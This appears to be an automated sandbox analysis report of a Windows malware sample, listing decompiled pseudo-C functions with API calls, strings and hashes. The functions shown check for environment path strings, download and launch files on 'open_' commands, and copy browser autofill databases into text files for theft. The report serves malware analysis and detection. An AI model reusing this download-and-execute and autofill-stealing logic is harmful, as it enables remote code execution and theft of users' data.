			E00409991(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				intOrPtr _t45;
				intOrPtr _t50;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t85;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t100;
				intOrPtr _t105;
				intOrPtr _t110;
				intOrPtr _t115;
				intOrPtr _t120;
				intOrPtr _t125;
				intOrPtr _t130;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr _t150;
				signed int _t202;
				signed int _t203;
				void* _t204;

				_push(0x20);
				E00423679(E004334BB, __ebx, __edi, __esi);
				_t150 = 0;
				 *((intOrPtr*)(_t204 - 4)) = 0;
				E00404E93(_t204 - 0x2c, _t204 + 8);
				_t202 = "C:\\Windows\\";
				_t36 = E0040CD72(0, _t204 - 0x2c, _t202, E004201E0(_t202));
				_t203 = _t202 | 0xffffffff;
				if(_t36 != _t203) {
					_t150 = 1;
				}
				_t178 = "C:\\\\Windows\\";
				if(E0040CD72(0, _t204 - 0x2c, _t178, E004201E0("C:\\\\Windows\\")) != _t203) {
					_t150 = _t150 + 1;
				}
				_t179 = "C:\\\\\\Windows\\";
				if(E0040CD72(0, _t204 - 0x2c, _t179, E004201E0("C:\\\\\\Windows\\")) != _t203) {
					_t150 = _t150 + 1;
				}
				_t45 =  *0x447174; // 0x6e93e0
				if(E0040CD72(0, _t204 - 0x2c, _t45, E004201E0(_t45)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t50 =  *0x447078; // 0x6e9368
				if(E0040CD72(0, _t204 - 0x2c, _t50, E004201E0(_t50)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t55 =  *0x447084; // 0x6e04c8
				if(E0040CD72(0, _t204 - 0x2c, _t55, E004201E0(_t55)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t60 =  *0x446d5c; // 0x6e94a0
				if(E0040CD72(0, _t204 - 0x2c, _t60, E004201E0(_t60)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t65 =  *0x446e14; // 0x6e9428
				if(E0040CD72(0, _t204 - 0x2c, _t65, E004201E0(_t65)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t70 =  *0x447098; // 0x6e9590
				if(E0040CD72(0, _t204 - 0x2c, _t70, E004201E0(_t70)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t75 =  *0x446b98; // 0x6e9578
				if(E0040CD72(0, _t204 - 0x2c, _t75, E004201E0(_t75)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t80 =  *0x446fd8; // 0x6e04f0
				if(E0040CD72(0, _t204 - 0x2c, _t80, E004201E0(_t80)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t85 =  *0x446d18; // 0x6e9608
				if(E0040CD72(0, _t204 - 0x2c, _t85, E004201E0(_t85)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t90 =  *0x446f04; // 0x6e9560
				if(E0040CD72(0, _t204 - 0x2c, _t90, E004201E0(_t90)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t95 =  *0x446e88; // 0x6e9398
				if(E0040CD72(0, _t204 - 0x2c, _t95, E004201E0(_t95)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t100 =  *0x447230; // 0x6e95d8
				if(E0040CD72(0, _t204 - 0x2c, _t100, E004201E0(_t100)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t105 =  *0x446fac; // 0x6e95f0
				if(E0040CD72(0, _t204 - 0x2c, _t105, E004201E0(_t105)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t110 =  *0x44703c; // 0x6e0510
				if(E0040CD72(0, _t204 - 0x2c, _t110, E004201E0(_t110)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t115 =  *0x446db0; // 0x6e98e0
				if(E0040CD72(0, _t204 - 0x2c, _t115, E004201E0(_t115)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t120 =  *0x446e84; // 0x6e9740
				if(E0040CD72(0, _t204 - 0x2c, _t120, E004201E0(_t120)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t125 =  *0x446b94; // 0x6e93f8
				if(E0040CD72(0, _t204 - 0x2c, _t125, E004201E0(_t125)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t130 =  *0x446a70; // 0x6e97e0
				if(E0040CD72(0, _t204 - 0x2c, _t130, E004201E0(_t130)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t135 =  *0x446c00; // 0x6e9440
				if(E0040CD72(0, _t204 - 0x2c, _t135, E004201E0(_t135)) != _t203) {
					_t150 = _t150 + 1;
				}
				_t140 =  *0x447094; // 0x6e9320
				_t199 = _t140;
				if(E0040CD72(0, _t204 - 0x2c, _t140, E004201E0(_t140)) != _t203) {
					_t150 = _t150 + 1;
				}
				E00404A66(_t204 - 0x2c, 1, 0);
				E00404A66(_t204 + 8, 1, 0);
				return E004236C3(_t150, _t199, _t203);
			}

0x00409991
0x00409998
0x004099a0
0x004099a6
0x004099a9
0x004099ae
0x004099c2
0x004099c7
0x004099cc
0x004099ce
0x004099ce
0x004099cf
0x004099ea
0x004099ec
0x004099ec
0x004099ed
0x00409a08
0x00409a0a
0x00409a0a
0x00409a0b
0x00409a28
0x00409a2a
0x00409a2a
0x00409a2b
0x00409a48
0x00409a4a
0x00409a4a
0x00409a4b
0x00409a68
0x00409a6a
0x00409a6a
0x00409a6b
0x00409a88
0x00409a8a
0x00409a8a
0x00409a8b
0x00409aa8
0x00409aaa
0x00409aaa
0x00409aab
0x00409ac8
0x00409aca
0x00409aca
0x00409acb
0x00409ae8
0x00409aea
0x00409aea
0x00409aeb
0x00409b08
0x00409b0a
0x00409b0a
0x00409b0b
0x00409b28
0x00409b2a
0x00409b2a
0x00409b2b
0x00409b48
0x00409b4a
0x00409b4a
0x00409b4b
0x00409b68
0x00409b6a
0x00409b6a
0x00409b6b
0x00409b88
0x00409b8a
0x00409b8a
0x00409b8b
0x00409ba8
0x00409baa
0x00409baa
0x00409bab
0x00409bc8
0x00409bca
0x00409bca
0x00409bcb
0x00409be8
0x00409bea
0x00409bea
0x00409beb
0x00409c08
0x00409c0a
0x00409c0a
0x00409c0b
0x00409c28
0x00409c2a
0x00409c2a
0x00409c2b
0x00409c48
0x00409c4a
0x00409c4a
0x00409c4b
0x00409c68
0x00409c6a
0x00409c6a
0x00409c6b
0x00409c71
0x00409c88
0x00409c8a
0x00409c8a
0x00409c92
0x00409c9e
0x00409caa

APIs

__EH_prolog3_GS.LIBCMT ref: 00409998
_strlen.LIBCMT ref: 004099B4
_strlen.LIBCMT ref: 004099D5
_strlen.LIBCMT ref: 004099F3
_strlen.LIBCMT ref: 00409A13
_strlen.LIBCMT ref: 00409A33
_strlen.LIBCMT ref: 00409A53
_strlen.LIBCMT ref: 00409A73
_strlen.LIBCMT ref: 00409A93
_strlen.LIBCMT ref: 00409AB3

Part of subcall function 0040CD72: _memcmp.LIBCMT ref: 0040CDB0

_strlen.LIBCMT ref: 00409AD3
_strlen.LIBCMT ref: 00409AF3
_strlen.LIBCMT ref: 00409B13
_strlen.LIBCMT ref: 00409B33
_strlen.LIBCMT ref: 00409B53
_strlen.LIBCMT ref: 00409B73
_strlen.LIBCMT ref: 00409B93
_strlen.LIBCMT ref: 00409BB3
_strlen.LIBCMT ref: 00409BD3
_strlen.LIBCMT ref: 00409BF3
_strlen.LIBCMT ref: 00409C13
_strlen.LIBCMT ref: 00409C33
_strlen.LIBCMT ref: 00409C53
_strlen.LIBCMT ref: 00409C73

Strings

C:\\Windows\, xrefs: 004099CF, 004099D4, 004099DC
C:\Windows\, xrefs: 004099AE, 004099B3, 004099BB
C:\\\Windows\, xrefs: 004099ED, 004099F2, 004099FA

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlen$H_prolog3__memcmp
String ID: C:\Windows\$C:\\Windows\$C:\\\Windows\
API String ID: 2171964571-1289299778
Opcode ID: 5d3bdb624965124342d4c07577b1a1e9cc9520d5f4e3e5567166f50c2f47bede
Instruction ID: 30007879f6087b8b5522a22824f3cab608c547d5aafafd51169921c6c929d4b0
Opcode Fuzzy Hash: 5d3bdb624965124342d4c07577b1a1e9cc9520d5f4e3e5567166f50c2f47bede
Instruction Fuzzy Hash: 2C91C6B7A00110ABDB10E7B9ECC6DAF67ECEA497107654A3BF504E3186E93CDD41862C

Uniqueness

Uniqueness Score: -1.00%

Function 00408B27 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 154
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00408B27(void* __ebx, char __edx, void* __edi, void* __esi, void* __eflags) {
				short _t51;
				intOrPtr _t52;
				CHAR* _t53;
				int _t54;
				int _t63;
				void* _t64;
				void* _t72;
				int _t102;
				void* _t107;
				CHAR* _t109;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t116;

				_t108 = __edi;
				_t105 = __edx;
				_push(0xc00);
				E00423679(E0043303F, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t112 - 4)) = 0;
				 *0x4476a8 = 1;
				E0041F6B0(_t112 - 0x7e0, 0, 0x3e8);
				_t114 = _t113 + 0xc;
				_t51 = 0x3b;
				 *((short*)(_t112 - 0xbcc)) = _t51;
				_t52 =  *((intOrPtr*)(_t112 + 8));
				if( *((intOrPtr*)(_t112 + 0x1c)) < 0x10) {
					_t52 = _t112 + 8;
				}
				_t53 = E00421D3B(0, _t105, _t108, _t52, _t112 - 0xbcc, _t112 - 0xbd0);
				_t115 = _t114 + 0xc;
				while(1) {
					L13:
					_t109 = _t53;
					while(_t109 != 0) {
						_t54 = lstrlenA(_t109);
						__eflags = _t54 - 5;
						if(_t54 > 5) {
							E0041F6B0(_t112 - 0x3f8, 0, 0x3e8);
							E0041F6B0(_t112 - 0xbc8, 0, 0x3e8);
							_t116 = _t115 + 0x18;
							_t63 = lstrlenA(_t109);
							__eflags = _t63;
							if(_t63 >= 0) {
								_t64 = 0;
								_t102 = _t109 - _t112 - 0x3f8;
								__eflags = _t102;
								do {
									_t107 = _t102 + _t64;
									_t105 =  *((intOrPtr*)(_t112 + _t107 - 0x3f8));
									 *((char*)(_t112 + _t64 - 0x3f8)) =  *((intOrPtr*)(_t112 + _t107 - 0x3f8));
									_t64 = _t64 + 1;
									__eflags = _t64 - 5;
								} while (_t64 < 5);
								 *((char*)(_t112 + _t64 - 0x3f8)) = 0;
							} else {
								 *((char*)(_t112 - 0x3f8)) = 0;
							}
							_t20 =  &(_t109[5]); // 0x5
							 *0x44758c(_t112 - 0xbc8, _t20);
							__eflags =  *0x447510(_t112 - 0x3f8, "open_");
							if(__eflags != 0) {
								 *0x4474e0(_t112 - 0x7e0,  *0x447058);
								_t72 = 0x14;
								 *0x4474e0(_t112 - 0x7e0, E00417BB8(_t72, __eflags));
								 *0x4474e0(_t112 - 0x7e0,  *0x446e8c);
								E0040E756(_t109, _t105, _t112 - 0x7e0);
								_t109 = 0x3c;
								E0041F6B0(_t112 - 0xc0c, 0, _t109);
								 *((intOrPtr*)(_t112 - 0xbfc)) = _t112 - 0x7e0;
								 *(_t112 - 0xc0c) = _t109;
								 *((intOrPtr*)(_t112 - 0xc08)) = 0;
								 *((intOrPtr*)(_t112 - 0xc04)) = 0;
								 *(_t112 - 0xc00) = "open";
								 *((intOrPtr*)(_t112 - 0xbf8)) = 0x43d12c;
								 *((intOrPtr*)(_t112 - 0xbf4)) = 0;
								 *((intOrPtr*)(_t112 - 0xbf0)) = 5;
								 *((intOrPtr*)(_t112 - 0xbec)) = 0;
								 *0x447544(_t112 - 0xc0c);
								E0041F6B0(_t112 - 0xc0c, 0, _t109);
								_t116 = _t116 + 0x1c;
							} else {
								E0040EFE5(_t112 - 0xbc8, __eflags);
							}
							E0041F6B0(_t112 - 0x7e0, 0, 0x3e8);
							E0041F6B0(_t112 - 0x3f8, 0, 0x3e8);
							E0041F6B0(_t112 - 0xbc8, 0, 0x3e8);
							_t53 = E00421D3B(0, _t105, _t109, 0, _t112 - 0xbcc, _t112 - 0xbd0);
							_t115 = _t116 + 0x30;
							goto L13;
						}
					}
					 *0x4476b0 = 1;
					E00404A66(_t112 + 8, 1, 0);
					return E004236C3(0, _t109, 0x3e8);
				}
			}

0x00408b27
0x00408b27
0x00408b27
0x00408b31
0x00408b45
0x00408b49
0x00408b53
0x00408b58
0x00408b61
0x00408b62
0x00408b69
0x00408b6c
0x00408b6e
0x00408b6e
0x00408b80
0x00408b85
0x00408d35
0x00408d35
0x00408d35
0x00408d37
0x00408b8e
0x00408b94
0x00408b97
0x00408ba6
0x00408bb4
0x00408bb9
0x00408bbd
0x00408bc3
0x00408bc5
0x00408bd7
0x00408bd9
0x00408bd9
0x00408bdb
0x00408bdb
0x00408bde
0x00408be5
0x00408bec
0x00408bed
0x00408bed
0x00408bf2
0x00408bc7
0x00408bc7
0x00408bc7
0x00408bf9
0x00408c04
0x00408c1c
0x00408c1e
0x00408c3d
0x00408c45
0x00408c53
0x00408c66
0x00408c75
0x00408c7c
0x00408c86
0x00408c91
0x00408ca1
0x00408ca7
0x00408cad
0x00408cb3
0x00408cbd
0x00408cc7
0x00408ccd
0x00408cd7
0x00408cdd
0x00408cec
0x00408cf1
0x00408c20
0x00408c26
0x00408c26
0x00408cfd
0x00408d0b
0x00408d19
0x00408d2d
0x00408d32
0x00000000
0x00408d32
0x00408b97
0x00408d47
0x00408d4c
0x00408d56
0x00408d56

APIs

__EH_prolog3_GS.LIBCMT ref: 00408B31
_memset.LIBCMT ref: 00408B53
_strtok_s.LIBCMT ref: 00408B80
lstrlenA.KERNEL32(00000000,?,?,?,00000C00,0040BB67,?), ref: 00408B8E
_memset.LIBCMT ref: 00408BA6
_memset.LIBCMT ref: 00408BB4
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000C00,0040BB67,?), ref: 00408BBD
lstrcpy.KERNEL32(?,00000005), ref: 00408C04
StrCmpCA.SHLWAPI(?,open_,?,?,?,?,?,?,?,?,?,00000C00,0040BB67,?), ref: 00408C16
lstrcat.KERNEL32(?), ref: 00408C3D

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 00408C53
lstrcat.KERNEL32(?), ref: 00408C66

Part of subcall function 0040E756: InternetOpenA.WININET(0043D12C,00000001,00000000,00000000,00000000), ref: 0040E794
Part of subcall function 0040E756: StrCmpCA.SHLWAPI(00000000,https), ref: 0040E7B3
Part of subcall function 0040E756: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,00000100,00000000), ref: 0040E7E7
Part of subcall function 0040E756: HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040E80A
Part of subcall function 0040E756: StrCmpCA.SHLWAPI(?,200), ref: 0040E820
Part of subcall function 0040E756: Sleep.KERNEL32(000003E8), ref: 0040E82F
Part of subcall function 0040E756: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0040E85A
Part of subcall function 0040E756: InternetReadFile.WININET(?,?,00000400,?), ref: 0040E8BC
Part of subcall function 0040E756: _memset.LIBCMT ref: 0040E8CF
Part of subcall function 0040E756: CloseHandle.KERNEL32(00000000), ref: 0040E8D8
Part of subcall function 0040E756: InternetCloseHandle.WININET(?), ref: 0040E8E4
Part of subcall function 0040E756: InternetCloseHandle.WININET(?), ref: 0040E8F0

_memset.LIBCMT ref: 00408C86
ShellExecuteEx.SHELL32 ref: 00408CDD
_memset.LIBCMT ref: 00408CEC
_memset.LIBCMT ref: 00408CFD
_memset.LIBCMT ref: 00408D0B
_memset.LIBCMT ref: 00408D19
_strtok_s.LIBCMT ref: 00408D2D

Strings

open_, xrefs: 00408C0A
open, xrefs: 00408CB3

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset$Internet$CloseHandlelstrcat$FileOpen_strtok_slstrlen$CountCreateExecuteH_prolog3_HttpInfoQueryReadShellSleepTick_malloc_randlstrcpywsprintf
String ID: open$open_
API String ID: 3942245631-3532745118
Opcode ID: 57cbe3800d5ddd0e532dcd778e5738fadabac12a38e96cf4a835eb00501d4102
Instruction ID: 5478e4016fb0233a794b51f4cdae40fa701d3e8cdb4ae937d0cdf0d040eb582a
Opcode Fuzzy Hash: 57cbe3800d5ddd0e532dcd778e5738fadabac12a38e96cf4a835eb00501d4102
Instruction Fuzzy Hash: AB515EB6D00219AADB109F65DC85EEE777CEB05348F0045FAE509E3151EB389B85CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00408F1F Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 226
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00408F1F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _t106;
				signed char _t107;
				void* _t114;
				intOrPtr _t134;
				void* _t135;
				intOrPtr* _t138;
				intOrPtr* _t145;
				intOrPtr _t149;
				intOrPtr _t185;
				void* _t186;

				E00423679(E00433F20, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t186 - 0x78c)) =  *((intOrPtr*)(_t186 + 8));
				_t152 = 0x104;
				 *((intOrPtr*)(_t186 - 0x798)) =  *((intOrPtr*)(_t186 + 0xc));
				E0041F6B0(_t186 - 0x32c, 0, 0x104);
				E0041F6B0(_t186 - 0x11c, 0, 0x104);
				 *((intOrPtr*)(_t186 - 0x790)) = 0;
				 *((intOrPtr*)(_t186 - 0x794)) = 0;
				 *0x4474e0(_t186 - 0x32c, E004181BE(0x104, __edi, 0, 0x1a), 0x78c);
				 *0x4474e0(_t186 - 0x32c,  *0x446d7c);
				 *0x4474e0(_t186 - 0x11c, _t186 - 0x32c);
				 *0x4474e0(_t186 - 0x11c, "\\");
				 *0x4474e0(_t186 - 0x11c,  *0x446d14);
				E004049CF(_t186 - 0x74c, _t186 - 0x11c);
				 *(_t186 - 4) = 0;
				_t106 = E00417DAA(_t186 - 0x74c, _t186 - 0x768);
				if(_t106[0xa] >= 8) {
					_t106 =  *_t106;
				}
				_t107 = GetFileAttributesW(_t106);
				if(_t107 == 0xffffffff) {
					L4:
					 *((intOrPtr*)(_t186 - 0x788)) = 0;
					L5:
					E0040CE40(0, _t186 - 0x768, 1);
					 *(_t186 - 4) =  *(_t186 - 4) | 0xffffffff;
					E00404A66(_t186 - 0x74c, 1, 0);
					_t198 =  *((intOrPtr*)(_t186 - 0x788));
					if( *((intOrPtr*)(_t186 - 0x788)) != 0) {
						_push(_t186 - 0x794);
						_push(_t186 - 0x11c);
						_t114 = E0040F8E2(_t152, _t186 - 0x790, 0, 1, _t198);
						_t199 = _t114;
						if(_t114 != 0) {
							E004049CF(_t186 - 0x74c,  *((intOrPtr*)(_t186 - 0x78c)));
							 *(_t186 - 4) = 1;
							E004179C2(_t152, _t186 - 0x74c, 0, 1, _t199);
							 *(_t186 - 4) = 3;
							E00404A66(_t186 - 0x74c, 1, 0);
							E0041F6B0(_t186 - 0x224, 0, _t152);
							 *0x4474e0(_t186 - 0x224,  *0x446a54, _t186 - 0x730, _t186 - 0x74c);
							if(E0040CD72(0, _t186 - 0x730, _t186 - 0x224, E004201E0(_t186 - 0x224)) != 0xffffffff) {
								E00404C57(_t186 - 0x730, 0, _t129 + 0xc);
								_t166 = _t186 - 0x730;
								E00404C57(_t186 - 0x730, 0x78, 0xffffffff);
								_t134 =  *((intOrPtr*)(_t186 - 0x730));
								if( *((intOrPtr*)(_t186 - 0x71c)) < 0x10) {
									_t134 = _t186 - 0x730;
								}
								_t152 = _t186 - 0x78c;
								_t135 = E0040F78C(_t186 - 0x78c, _t166, _t186 - 0x788, _t134);
								_t202 = _t135;
								if(_t135 != 0) {
									E0041F6B0(_t186 - 0x714, 0, 0x3e8);
									_push( *((intOrPtr*)(_t186 - 0x790)));
									_push( *((intOrPtr*)(_t186 - 0x788)));
									_push( *((intOrPtr*)(_t186 - 0x78c)));
									_t138 = E0040FA8C(_t152,  *((intOrPtr*)(_t186 - 0x794)), _t186 - 0x768, 0, 1, _t202);
									 *(_t186 - 4) = 4;
									if( *((intOrPtr*)(_t138 + 0x14)) >= 0x10) {
										_t138 =  *_t138;
									}
									 *0x4474e0(_t186 - 0x714, _t138);
									 *(_t186 - 4) = 3;
									E00404A66(_t186 - 0x768, 1, 0);
									_t185 =  *((intOrPtr*)(_t186 - 0x798));
									 *0x4474e0(_t185,  *0x446edc);
									_push("NULL");
									_push(_t186 - 0x714);
									if( *0x447510() != 0) {
										_push( *((intOrPtr*)(_t186 - 0x790)));
										_push( *((intOrPtr*)(_t186 - 0x788)));
										_push( *((intOrPtr*)(_t186 - 0x78c)));
										_t145 = E0040FA8C(_t152,  *((intOrPtr*)(_t186 - 0x794)), _t186 - 0x784, 0, _t185, __eflags);
										 *(_t186 - 4) = 5;
										__eflags =  *((intOrPtr*)(_t145 + 0x14)) - 0x10;
										if( *((intOrPtr*)(_t145 + 0x14)) >= 0x10) {
											_t145 =  *_t145;
										}
										 *0x4474e0(_t185, _t145);
										 *(_t186 - 4) = 3;
										E00404A66(_t186 - 0x784, 1, 0);
									} else {
										_t149 =  *((intOrPtr*)(_t186 - 0x730));
										if( *((intOrPtr*)(_t186 - 0x71c)) < 0x10) {
											_t149 = _t186 - 0x730;
										}
										 *0x4474e0(_t185, _t149);
									}
									 *0x4474e0(_t185, "\n");
								}
							}
							 *(_t186 - 4) =  *(_t186 - 4) | 0xffffffff;
							E00404A66(_t186 - 0x730, 1, 0);
						}
					}
					E0040F848(_t186 - 0x790, _t186 - 0x794);
					return E004236C3(_t152, _t186 - 0x790, _t186 - 0x794);
				}
				 *((intOrPtr*)(_t186 - 0x788)) = 1;
				if((_t107 & 0x00000010) == 0) {
					goto L5;
				}
				goto L4;
			}

0x00408f29
0x00408f31
0x00408f3a
0x00408f40
0x00408f50
0x00408f61
0x00408f6b
0x00408f71
0x00408f85
0x00408f98
0x00408fac
0x00408fbe
0x00408fd1
0x00408fe4
0x00408ff6
0x00408ff9
0x00409002
0x00409004
0x00409004
0x00409007
0x00409010
0x00409020
0x00409020
0x00409026
0x00409030
0x00409035
0x00409044
0x00409049
0x0040904f
0x0040905b
0x00409062
0x00409069
0x00409070
0x00409072
0x00409084
0x00409097
0x0040909a
0x004090a9
0x004090ad
0x004090bb
0x004090d0
0x004090fc
0x0040910d
0x00409116
0x0040911c
0x00409128
0x0040912e
0x00409130
0x00409130
0x0040913d
0x00409143
0x00409149
0x0040914b
0x00409160
0x0040916e
0x0040917a
0x00409180
0x00409186
0x0040918e
0x00409196
0x00409198
0x00409198
0x004091a2
0x004091b1
0x004091b5
0x004091c0
0x004091c7
0x004091cd
0x004091d8
0x004091e1
0x00409202
0x0040920e
0x0040921a
0x00409220
0x00409228
0x0040922c
0x00409230
0x00409232
0x00409232
0x00409236
0x00409245
0x00409249
0x004091e3
0x004091ea
0x004091f0
0x004091f2
0x004091f2
0x004091fa
0x004091fa
0x00409254
0x00409254
0x0040914b
0x0040925a
0x00409268
0x00409268
0x00409072
0x00409279
0x00409283
0x00409283
0x00409012
0x0040901e
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00408F29
_memset.LIBCMT ref: 00408F50
_memset.LIBCMT ref: 00408F61

Part of subcall function 004181BE: _memset.LIBCMT ref: 004181DF
Part of subcall function 004181BE: SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

lstrcat.KERNEL32(?,00000000), ref: 00408F85
lstrcat.KERNEL32(?), ref: 00408F98
lstrcat.KERNEL32(?,?), ref: 00408FAC
lstrcat.KERNEL32(?,0043D134), ref: 00408FBE
lstrcat.KERNEL32(?), ref: 00408FD1

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000104,?,?,?,00408FFE,?,?), ref: 00417DCB
Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00408FFE,?,?,?,?,?,0040939F), ref: 00417DFC

GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0040939F,?,?), ref: 00409007
_memset.LIBCMT ref: 004090BB
lstrcat.KERNEL32(?,00000001), ref: 004090D0
_strlen.LIBCMT ref: 004090DD
_memset.LIBCMT ref: 00409160

Part of subcall function 0040FA8C: __EH_prolog3_GS.LIBCMT ref: 0040FA93
Part of subcall function 0040FA8C: _memcmp.LIBCMT ref: 0040FABC
Part of subcall function 0040FA8C: _memset.LIBCMT ref: 0040FAE5
Part of subcall function 0040FA8C: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,000000FF,00000000,-0000000C,?,?,00000000), ref: 0040FB20

lstrcat.KERNEL32(?,00000000), ref: 004091A2
lstrcat.KERNEL32(?,00000001), ref: 004091C7
StrCmpCA.SHLWAPI(?,NULL,?,?,?,000000FF,00000000,-0000000C,?,?,00000000,?,?,?,0040939F,?), ref: 004091D9
lstrcat.KERNEL32(?,?), ref: 004091FA
lstrcat.KERNEL32(?,00000000), ref: 00409236
lstrcat.KERNEL32(?,0043D130), ref: 00409254

Strings

NULL, xrefs: 004091CD

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$ByteCharH_prolog3_MultiWide_strlen$AllocAttributesFileFolderLocalPath_memcmp
String ID: NULL
API String ID: 3560504829-324932091
Opcode ID: 02360c41cb0e57dd1f9bcf637042dc43e26ec9c708ef74081f9a63bdbbdd3c41
Instruction ID: 9af4bfbbc6aca78fc55daafbc95f6b0a83ecffbd1462d5ea89eac7d39fb01353
Opcode Fuzzy Hash: 02360c41cb0e57dd1f9bcf637042dc43e26ec9c708ef74081f9a63bdbbdd3c41
Instruction Fuzzy Hash: CD916C72D08128ABDF21EB60DD49ADE7BB8EF05314F1045EAE10DA3191DB386B85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041140C Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0041140C(CHAR* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				void* _v544;
				char _v548;
				char _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				void* _t46;
				void* _t58;
				void* _t63;
				intOrPtr _t69;
				CHAR* _t70;
				void* _t89;
				signed int _t93;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t101;

				_t37 =  *0x444664; // 0xfa3a0753
				_v8 = _t37 ^ _t93;
				_v544 = _a4;
				_v556 = _a8;
				_v560 = _a12;
				_t81 = __ecx;
				E0041F6B0( &_v276, 0, 0x104);
				 *0x4474e0( &_v276,  *0x447058);
				_t46 = 0x1a;
				 *0x4474e0( &_v276, E00417BB8(_t46, _t101));
				CopyFileA(_t81,  &_v276, 1);
				E0041F6B0( &_v540, 0, 0x104);
				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v556, _v544);
				_t92 =  *0x446a68; // 0x6ecc58
				_t58 =  *0x447304( &_v276,  &_v552);
				_t97 = _t94 + 0x30;
				if(_t58 == 0) {
					_t63 =  *0x4472b8(_v552, _t92, 0xffffffff,  &_v548, 0);
					_t98 = _t97 + 0x14;
					if(_t63 == 0) {
						_v544 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
						while(1) {
							_push(_v548);
							if( *0x4472d4() != 0x64) {
								break;
							}
							_t69 =  *0x4472f4(_v548, 0);
							_t92 = _t69;
							_t70 =  *0x4472f4(_v548, 1);
							_t98 = _t98 + 0x10;
							_t81 = _t70;
							 *0x4474e0(_v544, _t69);
							 *0x4474e0(_v544, "\t");
							 *0x4474e0(_v544, _t70);
							 *0x4474e0(_v544, "\n");
						}
						E0041EAE0(_v560,  &_v540, lstrlenA(_v544), 3);
						E0041F6B0( &_v544, 0, 4);
					}
					 *0x4472d8(_v548);
					 *0x447308(_v552);
				}
				return E0041F69E(DeleteFileA( &_v276), _t81, _v8 ^ _t93, _t89, 0, _t92);
			}

0x00411415
0x0041141c
0x00411424
0x0041142e
0x0041143d
0x0041144d
0x0041144f
0x00411464
0x0041146c
0x0041147a
0x0041148a
0x00411499
0x004114b9
0x004114bf
0x004114d3
0x004114d9
0x004114de
0x004114f5
0x004114fb
0x00411500
0x00411519
0x0041157f
0x0041157f
0x0041158f
0x00000000
0x00000000
0x00411528
0x00411536
0x00411538
0x0041153e
0x00411548
0x0041154a
0x0041155b
0x00411568
0x00411579
0x00411579
0x004115b3
